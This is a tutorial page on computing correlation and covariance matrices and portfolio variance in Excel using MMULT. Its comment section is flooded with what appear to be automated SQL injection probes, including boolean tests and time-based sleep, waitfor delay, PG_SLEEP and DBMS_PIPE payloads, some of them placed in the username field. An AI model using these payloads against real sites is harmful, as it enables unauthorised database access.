School of Stocks
Home : Risk and Money Management

Calculating Covariance Matrix and Portfolio Variance in Excel

In this chapter, we will explain how to calculate correlation matrix and covariance matrix comprising of multiple stocks, in Microsoft Excel. We will also explain how to calculate portfolio variance and standard deviation, in Excel.

Abhishek Chinchalkar
14 minutes read
comment
Comments
Users learning chapter

In the previous chapter, we discussed how to calculate the expected return on a portfolio. We also spoke about how to calculate portfolio variance and standard deviation as well as the beta of a portfolio. However, we did so manually, which can become quite cumbersome and time consuming if there are more than 2-3 stocks in a portfolio. In this chapter, we will continue our focus on what we spoke about in the last few chapters. However, we will talk about how to do so in Microsoft Excel, so as to reduce the quantum of manual work and save on time.

Calculating Correlation Matrix in Microsoft Excel:

In chapter 7, we spoke about correlation. Back then, we spoke of how to calculate correlation between just two stocks. But what if there are multiple stocks, which would make it necessary to calculate several correlation pairs? This is indeed a situation in case of a portfolio, which comprises of 3 or more stocks. While the number of stocks in a portfolio can vary from one investor or trader to another, typically, an ideal portfolio comprises between 8 to 20 stocks. Let us assume an investor wants to build a diversified portfolio comprising of 5 stocks – A, B, C, D, and E. Because the investor wants to diversify, he or she would be interested in knowing the correlations between all the pairs of stocks. How many pairs of correlation can we calculate for a 5-stock portfolio? Well, this can be solved using the combinatorics formula that we discussed in the last chapter. The answer is 10 – AB, AC, AD, AE, BC, BD, BE, CD, CE, and DE. As there are 10 pairs of correlation, analyzing them would be much simpler if done using a correlation matrix. Let us understand how to create a correlation matrix in Excel using the 1-year daily log returns data of the following ten stocks: HDFC bank, SBI, Tata Steel, Lupin, Wipro, Tata Motors, Bajaj Finserv, Dabur, Balkrishna Industries, and Graphite.

Step-1:

Download the 1-year daily price data of each of the above stocks. You could do so from either the NSE or the BSE website. Ensure that the data is sorted date-wise.

Step-2:

Once the data has been downloaded, calculate the daily log returns for each stock. A portion of the price and returns data has been shown in the image below:

step_two_chapter

Step-3:

Once the returns for each stock have been populated, the next step is to create a correlation matrix. To do so, click on the Data tab. Then, within the data tab, if you look to the far right, there will be an option called ‘Data Analysis’ within the Analyze ribbon. This has been shown in the image below and highlighted in red:

data_analysis_chap_ten

If the Data Analysis option is not visible, do not worry. You can enable it by clicking on File Options. Within Options, click the Add-ins tab. To the bottom of the Add-ins dialog box, there will be a drop-down menu that reads Manage. Within this drop-down menu, choose Excel Add-ins and click on Go. This will open the Add-ins dialog box. Tick the Analysis ToolPak option and then click on OK.

data_analysis

Then go back to the Data tab and select Data Analysis. There are various statistical calculations that can be performed quite quickly and efficiently using the Data Analysis ToolPak. Because we are interested in calculating correlations, click on the Correlation button within the Data Analysis dialog box and select OK. This will open the Correlation dialog box.

Step-4:

Within the Correlation dialog box, you need to do three things as follows:

  • First, select the ‘Input Range’. To do so, select all the cells that contain the returns data, including the row that contains stock names.
  • Next, tick the ‘Labels in First Row’ option.
  • Finally, tick the ‘Output Range’ option and then select any blank cell where you would want the output to be displayed.

Once each of these three things have been inputted, select OK. The correlation matrix would now be populated. Below are the results of the correlation:

correlation_ten

You could also perform conditional formatting and color the cells to easily identify which stocks share strong correlation and which share weak correlation. In the above table, the color of the cells varies from dark green (which represents stocks sharing the highest correlation) to dark red (which represents stocks sharing the lowest correlation).

Within the context of portfolio diversification, a correlation matrix is an important table. It lets one understand the extent of correlation between all the possible pairs of stocks that are a part of the portfolio. A portfolio that has a strong positive correlation (such as above 0.5, on average) is indicative of poor diversification and therefore is inherently riskier. On the other hand, a portfolio that has a strong negative correlation (such as below -0.5, on average) is over diversified and therefore would compromise on the return potential. Hence, it is important to strike a balance between a portfolio that is poorly diversified and one that is over diversified. This also applies to the number of stocks in a portfolio (very few stocks would indicate at poor diversification, while too many stocks could indicate at over diversification). A well-diversified portfolio is one that has low to moderate correlation (such as between 0 and 0.5, on average). Such a degree of diversification would help in reducing portfolio risks, particularly the ones that are unsystematic in nature.

Calculating Covariance Matrix in Microsoft Excel:

In a similar manner in which we calculated the correlation matrix, we can calculate the covariance matrix as well. To do so, again go to the Data tab and within that select Data Analysis. Once the Data Analysis dialog box pops up, select Covariance. Then, within the covariance dialog box, perform the following:

  • Select the Input Range
  • Tick the ‘Labels in First Row’ option
  • Select the Output Range

Finally, click on OK.

Doing so would populate the covariance matrix. Below are the results of the covariance matrix for the same set of data that we presented when explaining the correlation matrix.

correlation_matrix

That said, keep in mind that the covariance matrix calculated using the Data Analysis ToolPak represents the population covariance rather than sample covariance. There will be minor differences in values between the two. Meanwhile, the blue cells in the table above reflect covariance of a stock with itself, which, as we know by now, is nothing but the variance of the stock. So, as we can see, all the blue cells in the table above are variances, while the rest are all covariances. It is for this reason that a covariance matrix is referred to as a variance-covariance matrix as well.

Calculating Portfolio Variance in Microsoft Excel:

Finally, let us now turn our attention towards portfolio variance. As we saw in the last chapter, when there are more than 2-3 stocks in a portfolio, which is typically the case, calculating the portfolio variance becomes quite complex and time consuming. Hence, the most optimal way to solve for portfolio variance is in Microsoft Excel. To calculate portfolio variance in Excel, all that we need are individual stock weights and all the covariance pairs. Let us understand this using the same example of the 10-stock portfolio discussed earlier in this chapter. We have already calculated the covariance matrix in the previous section. Let us again paste that matrix here.

portfolio_varience

When plotting the covariance matrix using the Data Analysis ToolPak, all the duplicate entries are ignored, as can be seen in the table above where all the cells that are above the blue coloured cells are blank. The reason why these are blank is because they are duplicates of entries that have already been made in the filled cells that are below the blue coloured cells. For instance, notice that cell B3 displays the covariance of HDFC bank and SBI. However, see that the corresponding duplicate entry has been left blank in cell C2, which represents the covariance of SBI and HDFC bank. Recollect from our earlier chapter: covariance of stock A and B is the same as covariance of stock B and A.

Having said that, to calculate portfolio variance, the first thing that we need to do is to populate the entire table above by filling all the blank cells as well. To do so, all that we need to do is transpose the entries from each column to the corresponding row.

For example, to transpose the vertical entries from cells B3 to B11 horizontally across the cells C2 to K2, we use the function =TRANSPOSE(B3:B11) in the cell C2. Doing so would paste all the vertical entries from B3 to B11 horizontally across C2 to K2. To understand this better, look at the image below. See that by inputting the transpose function in cell C2 (look at the formula bar), the cells from C2 to K2 get populated using the corresponding entries from cells B3 to B11.

correspond_b11_b3

Similarly, to transpose the vertical entries from cells C4 to C11 horizontally across the cells D3 to K3, we use the function =TRANSPOSE(C4:C11) in the cell D3, as shown below:

cell_d3

We do this in the same manner until all the corresponding empty cells are filled. The final populated covariance matrix has been posted below:

d34

Now that the covariance matrix has been populated by filling all the blank cells, the next step is write down the stock weights for each of the 10 stocks. Below mentioned are the weights that we have assigned for each stock:

d35

Ensure that the total weight adds up to 100%. Now that we have both the individual stock weights and the covariance matrix, the final step is to calculate the portfolio variance. In the image below, see how we have calculated the portfolio variance and annualized standard deviation.

stadard_deviation10

As can be seen in cells F14 and F15, the portfolio variance and annualized standard deviation are 0.0002289 and 23.92%, respectively. Kindly notice the Excel formulas used above to calculate the variance. At first sight, the formula might look quite intimidating. But do not worry, we shall simplify this in the next section.

Understanding Excel’s MMULT function to solve for Portfolio Variance:

In the previous chapter, we spoke about a formula that can be used for calculating portfolio variance. However, using that formula is feasible only if the portfolio comprises of 2 or 3 stocks. If a portfolio comprises more than 3 stocks, solving using that formula becomes complex and time consuming. Hence, an ideal way to solve for portfolio variance is in Excel, using the function MMULT. This function is used to multiply two matrices. That said, before speaking about the MMULT function, one needs to understand the basics of matrix. To learn about matrix, we suggest you visit the following links:

  • To learn the basics of matrix, click here
  • To learn how to multiply matrices, click here

Coming back, from a matrix perspective, portfolio variance is expressed as:

portfolio_varience10

In the above equation, W refers to the column vector of stock weights. It is the third matrix that consists of a single column. Meanwhile, Wt refers to the transpose of stock weights (row vector). It is the first matrix that consists of a single row. Finally, covariance matrix refers to all the possible pairs of covariances. Keep in mind that the order mentioned in the above equation is important – first matrix is the row vector of stock weights, second matrix is the covariance matrix, and third matrix is the column vector of stock weights.

Above, the 1st matrix is multiplied by the second matrix. This resulting product is then multiplied by the 3rd matrix.

When multiplying two matrices, the number of columns in matrix 1 must equal the number of rows in matrix 2. It is for this reason that the first matrix of stock weights is transposed, so that the number of columns in the weight matrix matches with the number of rows in the covariance matrix. Let us understand this using a simple, hypothetical example of two stocks. Below, the table on the left represents the weight and that on the right represents the covariance matrix.

When expressed in the form of a matrix, the above tables would look like the ones below:

Above, in case of the matrix on the left, there are two rows and one column. As such, this is a 2 by 1 (or 2x1) matrix. Meanwhile, in case of the matrix on the right, there are two rows and two columns. As such, this is a 2 by 2 (or 2x2) matrix. Keep in mind, a matrix is expressed in the form M by N, where M refers to the number of rows and N refers to the number of columns. So:

  • Matrix 1 = 2x1 matrix
  • Matric 2 = 2x2 matrix

Recollect what we said earlier. When multiplying two matrices, the number of columns in matrix 1 must equal the number of rows in matrix 2. Above, however, matrix 1 consists of 1 column while matrix 2 consists of 2 rows. Because of this mismatch, we need to transpose matrix 1, so that it then becomes a 1x2 matrix and can then be multiplied with matrix 2.

Rather than doing manually (which can get quite laborious and time consuming), this calculation can be quickly done in Excel using the =MMULT(A,B) function, where A represents array 1 (the 1st matrix) and B represents array 2 (the 2nd matrix). Let us do that below:

values_consume

Before we explain the above image, here is an important thing to keep in mind. If you are using the latest version of Microsoft Office 365, you can directly hit enter after inputting all the required arrays in the MMULT function to generate the output. However, if you are using any other version of Microsoft Office, you may need to press Shift + Control + Enter to generate the output.

Now, in the above image, notice the highlighted cell E6 and the formula that was used to calculate this, in cell F6. As you can see, we got an error (#VALUE!). The reason why we got an error is because the number of columns in the weight matrix (1) did not match with the number of rows in the covariance matrix (2). Hence, we need to transpose the weights, so that the matrix changes from a 2x1 to a 1x2 matrix. So, let us work again.

matrix10

The result of the product of the two matrices has been calculated in cell E6 and the formula that was used to calculate this has been written in cell G6. Notice that multiplying a [1x2] matrix with a [2*2] matrix results in a [1x2] matrix, as can be seen in the highlighted cells E6 and F6.

Now, this resulting product must be multiplied by the third matrix (which is the column vector of stock weights) to get the value of the portfolio variance. Let us do that below:

letusdo10

In the above image, notice the highlighted cell E8 and the formula that was used to calculate this in cell F8. See that the resulting product (E6#), which is a [1x2] matrix (E6:E7), is multiplied by the column vector of stock weights, which is a [2x1] matrix. Notice that multiplying a [1x2] matrix with a [2*1] matrix results in a [1x1] matrix, as can be seen in the highlighted cell E8. This value, 0.010536, is nothing but the portfolio variance.

Instead of using the function MMULT twice, we can further shorten our work by nesting an MMULT within another MMULT. To understand how to do this, look at the image below:

mob11

In the above image, notice the highlighted cell E6 and the formula that was used to calculate this in cell F6. Notice how MMULT has been nested inside another MMULT, to directly generate the portfolio variance.

As we know from our discussions from the previous chapters, variance is not much useful by itself. What is instead more valuable is standard deviation. We know that standard deviation is nothing but the square root of variance. So, let us now calculate portfolio standard deviation from the portfolio variance arrived at in the above image.

portfolio-sd-10

Now that you understand how to calculate portfolio variance using the MMULT function, it is time to go back to our earlier example of the 10-stock portfolio and understand how the MMULT function was used. The image has been repasted below:

psd10-formula

The variance that we get, 0.0002289, is based on daily stock returns. Taking the square root of this gives us a standard deviation of 0.01512962. Keep in mind that this is the daily standard deviation. To annualize it, we multiply this value by the square root of 250, which gives us 0.239220301, or 23.92%.

While all this may sound intimidating, it is not. In fact, once you understand how to use the MMULT function, you would be in a position to calculate portfolio variance within minutes, no matter how many stocks the portfolio comprises of. All that you need to do is populate the covariance matrix using Excel’s Data Analysis toolpak and have the stock weights ready, before using the MMULT function.

Next Chapter

Portfolio Optimization and the Efficient Frontier

2 Lessons

In this chapter, we will discuss portfolio optimization strategies and talk about the ways in which one can fine tune a portfolio with the objective of minimizing risk for a given level of return.

Coefficient of Variation, Sharpe Ratio, and Treynor Ratio

5 Lessons

In this chapter, we will talk about some key statistical ratios that can be used to measure and compare the risk and return characteristics of a portfolio.

Comments & Discussions in

FYERS Community Learn More...

Responses

CpjJwWHV commented on March 29th, 2022 at 5:33 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
-1 OR 2+242-242-1=0+0+0+1 --


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
-1 OR 2+868-868-1=0+0+0+1


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
-1' OR 2+888-888-1=0+0+0+1 --


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
-1' OR 2+358-358-1=0+0+0+1 or 'UxoT1gQt'='


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
-1" OR 2+331-331-1=0+0+0+1 --


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
if(now()=sysdate(),sleep(15),0)


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


CpjJwWHV commented on March 29th, 2022 at 6:00 PM  
-1; waitfor delay '0:0:15' --


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
-1); waitfor delay '0:0:15' --


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
1 waitfor delay '0:0:15' --


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
Jl0DxQ8C'; waitfor delay '0:0:15' --


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
-5 OR 16=(SELECT 16 FROM PG_SLEEP(15))--


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
-5) OR 222=(SELECT 222 FROM PG_SLEEP(15))--


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
-1)) OR 881=(SELECT 881 FROM PG_SLEEP(15))--


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
L2kM2rrR' OR 89=(SELECT 89 FROM PG_SLEEP(15))--


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
oVXrgGbI') OR 580=(SELECT 580 FROM PG_SLEEP(15))--


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
cMPK7dNr')) OR 17=(SELECT 17 FROM PG_SLEEP(15))--


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
1'"


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
@@bVkQy


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:01 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:02 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:03 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:04 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:06 PM  
555


CpjJwWHV commented on March 29th, 2022 at 6:06 PM  
555


wrBEIRqX commented on November 9th, 2023 at 4:33 PM  
555


wrBEIRqX commented on November 9th, 2023 at 4:44 PM  
555


wrBEIRqX commented on November 9th, 2023 at 4:45 PM  
555


wrBEIRqX commented on November 9th, 2023 at 4:55 PM  
555


wrBEIRqX commented on November 9th, 2023 at 4:56 PM  
555


-1 OR 2+667-667-1=0+0+0+1 -- commented on November 9th, 2023 at 4:56 PM  
555


-1 OR 2+240-240-1=0+0+0+1 commented on November 9th, 2023 at 4:56 PM  
555


-1' OR 2+229-229-1=0+0+0+1 -- commented on November 9th, 2023 at 4:56 PM  
555


-1' OR 2+689-689-1=0+0+0+1 or 'XKcLirLD'=' commented on November 9th, 2023 at 4:56 PM  
555


-1" OR 2+478-478-1=0+0+0+1 -- commented on November 9th, 2023 at 4:56 PM  
555


if(now()=sysdate(),sleep(15),0) commented on November 9th, 2023 at 4:57 PM  
555


0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z commented on November 9th, 2023 at 4:57 PM  
555


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z commented on November 9th, 2023 at 4:58 PM  
555


(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ commented on November 9th, 2023 at 4:59 PM  
555


1 waitfor delay '0:0:15' -- commented on November 9th, 2023 at 5:00 PM  
555


Ye0bJ7ZG'; waitfor delay '0:0:15' -- commented on November 9th, 2023 at 5:00 PM  
555


cv1LptxS' OR 326=(SELECT 326 FROM PG_SLEEP(15))-- commented on November 9th, 2023 at 5:01 PM  
555


itKcCi1e') OR 720=(SELECT 720 FROM PG_SLEEP(15))-- commented on November 9th, 2023 at 5:02 PM  
555


90SjfPV0')) OR 735=(SELECT 735 FROM PG_SLEEP(15))-- commented on November 9th, 2023 at 5:03 PM  
555


wrBEIRqX'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' commented on November 9th, 2023 at 5:04 PM  
555


1'" commented on November 9th, 2023 at 5:04 PM  
555


@@SgE0m commented on November 9th, 2023 at 5:04 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:05 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:06 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:06 PM  
-1 OR 2+348-348-1=0+0+0+1 --


wrBEIRqX commented on November 9th, 2023 at 5:06 PM  
-1 OR 2+436-436-1=0+0+0+1


wrBEIRqX commented on November 9th, 2023 at 5:06 PM  
-1' OR 2+831-831-1=0+0+0+1 --


wrBEIRqX commented on November 9th, 2023 at 5:06 PM  
-1' OR 2+386-386-1=0+0+0+1 or 'P8CpBpJo'='


wrBEIRqX commented on November 9th, 2023 at 5:06 PM  
-1" OR 2+288-288-1=0+0+0+1 --


wrBEIRqX commented on November 9th, 2023 at 5:07 PM  
if(now()=sysdate(),sleep(15),0)


wrBEIRqX commented on November 9th, 2023 at 5:08 PM  
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


wrBEIRqX commented on November 9th, 2023 at 5:08 PM  
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


wrBEIRqX commented on November 9th, 2023 at 5:09 PM  
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


wrBEIRqX commented on November 9th, 2023 at 5:10 PM  
-1; waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 5:11 PM  
-1); waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 5:11 PM  
1 waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 5:12 PM  
t9ceCRWD'; waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 5:13 PM  
-5 OR 524=(SELECT 524 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 5:14 PM  
-5) OR 762=(SELECT 762 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 5:15 PM  
-1)) OR 961=(SELECT 961 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 5:16 PM  
yFf5Ra39' OR 259=(SELECT 259 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 5:17 PM  
z76CI36d') OR 787=(SELECT 787 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 5:17 PM  
wdvcwxRR')) OR 575=(SELECT 575 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 5:18 PM  
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


wrBEIRqX commented on November 9th, 2023 at 5:19 PM  
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


wrBEIRqX commented on November 9th, 2023 at 5:19 PM  
1'"


wrBEIRqX commented on November 9th, 2023 at 5:19 PM  
@@b4WrP


wrBEIRqX commented on November 9th, 2023 at 5:20 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:21 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:21 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:21 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:21 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:21 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:21 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:22 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:22 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:23 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:24 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:25 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:26 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:26 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:27 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:28 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:29 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:29 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:29 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:29 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:29 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:31 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:32 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:32 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:33 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:34 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:34 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:35 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:36 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:36 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:37 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:37 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:37 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:37 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:37 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:38 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:44 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:45 PM  
555


wrBEIRqX commented on November 9th, 2023 at 5:53 PM  
555


wrBEIRqX commented on November 9th, 2023 at 10:07 PM  
555


zbdrariI commented on November 13th, 2023 at 1:16 AM  
555


zbdrariI commented on November 13th, 2023 at 1:20 AM  
555


zbdrariI commented on November 13th, 2023 at 1:20 AM  
555


zbdrariI commented on November 13th, 2023 at 1:22 AM  
555


zbdrariI commented on November 13th, 2023 at 1:22 AM  
555


1'" commented on November 13th, 2023 at 1:23 AM  
555


@@w5ku7 commented on November 13th, 2023 at 1:23 AM  
555


zbdrariI commented on November 13th, 2023 at 1:24 AM  
555


zbdrariI commented on November 13th, 2023 at 1:24 AM  
555


zbdrariI commented on November 13th, 2023 at 1:26 AM  
1'"


zbdrariI commented on November 13th, 2023 at 1:26 AM  
@@BCLnY


zbdrariI commented on November 13th, 2023 at 1:26 AM  
555


zbdrariI commented on November 13th, 2023 at 1:26 AM  
555


zbdrariI commented on November 13th, 2023 at 1:27 AM  
555


zbdrariI commented on November 13th, 2023 at 1:27 AM  
555


zbdrariI commented on November 13th, 2023 at 1:27 AM  
555


zbdrariI commented on November 13th, 2023 at 1:28 AM  
555


zbdrariI commented on November 13th, 2023 at 1:28 AM  
555


zbdrariI commented on November 13th, 2023 at 1:29 AM  
555


zbdrariI commented on November 13th, 2023 at 1:29 AM  
555


zbdrariI commented on November 13th, 2023 at 1:29 AM  
555


zbdrariI commented on November 13th, 2023 at 1:29 AM  
555


zbdrariI commented on November 13th, 2023 at 1:29 AM  
555


zbdrariI commented on November 13th, 2023 at 1:30 AM  
555


zbdrariI commented on November 13th, 2023 at 1:30 AM  
555


zbdrariI commented on November 13th, 2023 at 1:32 AM  
555


zbdrariI commented on November 13th, 2023 at 2:48 AM  
555


zbdrariI commented on November 13th, 2023 at 2:48 AM  
555


zbdrariI commented on November 13th, 2023 at 2:50 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:31 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:31 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:41 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:41 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:47 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:48 AM  
555


1'" commented on December 2nd, 2023 at 8:51 AM  
555


@@vtsZK commented on December 2nd, 2023 at 8:51 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:52 AM  
555


zbdrariI commented on December 2nd, 2023 at 8:53 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:00 AM  
1'"


zbdrariI commented on December 2nd, 2023 at 9:00 AM  
@@VRbty


zbdrariI commented on December 2nd, 2023 at 9:01 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:01 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:05 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:05 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:05 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:05 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:06 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:10 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:10 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:10 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:10 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:11 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:15 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:16 AM  
555


zbdrariI commented on December 2nd, 2023 at 9:23 AM  
555


zbdrariI commented on December 2nd, 2023 at 11:51 AM  
555


zbdrariI commented on December 2nd, 2023 at 11:52 AM  
555


zbdrariI commented on December 2nd, 2023 at 11:54 AM  
555


WkYxnTGh commented on December 2nd, 2023 at 7:45 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 7:47 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 7:48 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 7:53 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 7:54 PM  
555


1'" commented on December 2nd, 2023 at 7:59 PM  
555


@@1FuEW commented on December 2nd, 2023 at 7:59 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 8:00 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 8:00 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 8:07 PM  
1'"


WkYxnTGh commented on December 2nd, 2023 at 8:08 PM  
@@3q80f


WkYxnTGh commented on December 2nd, 2023 at 8:08 PM  
555


WkYxnTGh commented on December 2nd, 2023 at 8:09 PM  
555


